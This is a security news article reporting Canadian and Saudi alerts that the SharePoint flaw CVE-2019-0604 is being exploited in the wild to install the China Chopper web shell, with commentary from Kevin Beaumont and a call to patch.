SharePoint Problem Returns. Be Afraid.

Both Canada and Saudi Arabia issued alerts to the security community that they had observed traces of CVE-2019-0604 as part of other cyber attacks.

CVE-2019-0604, the SharePoint problem that became semi-famous because Microsoft had to reissue the patch for it after they had already put one out, has been seen in the wild.
Both
Canada
and
Saudi Arabia
issued alerts to the security community that they had observed traces of its presence as part of other cyber attacks.
Both of them said that the exploit ended up delivering the China Chopper web shell to vulnerable servers.
The Saudis said activity to drop the Chopper has happened within the last two weeks to multiple organizations that have been impacted and infected by the active exploitation of the CVE-2019-0604, a vulnerability that can grant remote code execution.
They also say that they think this problem is poised to be highly amplified in the future since it affects Microsoft SharePoint, which is Internet-facing in most targets as well as in most cases being integrated with the internal Active Directory.
Not only is this exploitation technique still relatively successful, it is simple and can be performed using an HTTP request.
They also make the point that organizations may not have previously prioritized patching of vulnerabilities that were not known to be actively exploited. Like this one.
Once the first proof-of-concept (PoC) code hit for this problem, the Saudis observed a spike in scanning activities on this specific vulnerability which indicates a rapid and quick adoption from multiple threat actors that are keen to utilize this easy and remote access to organization networks.
So they have quite reasonably come to the conclusion that, Threat actors with varying motivations are often quick to weaponize PoC code following public disclosures. This swift exploitation ultimately increases the likelihood that their campaigns will be successful. Canada found that the academic, utility, heavy industry, manufacturing and technology sectors were all affected by this activity. They were also polite about why this happened: Microsoft released security updates addressing this vulnerability in February and March 2019; however, many systems remain outdated. Security maven Kevin Beaumont
tweeted
the sightings in the wild to others, while adding his own comment.
There isnt yet a public (web accessible) exploit for RCE against SharePoint (the ones on Github and ZDI dont work out the box). If that changes I think this will be one of the biggest vulns in years. It would own a lot of enterprises. Like, a LOT.
But his assessment of the threat actors is simple.
Note some APT and crimeware groups are already using it, i.e. ones with skills.
This fits in with the Saudis saying it is desirable to use while finding evidence of a skilled level of attackers doing just that. The public exploits are nonfunctional which keeps the skids from attempting to use them. But if a functional one is posted, that would change the dynamics of the situation greatly. Mr. Beaumont seems to agree.
Patch. Now.
— Larry Loeb has written for many of the last centurys major dead tree computer magazines, having been, among other things, a consulting editor for BYTE magazine and senior editor for the launch of WebWeek.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
SharePoint Problem Returns. Be Afraid.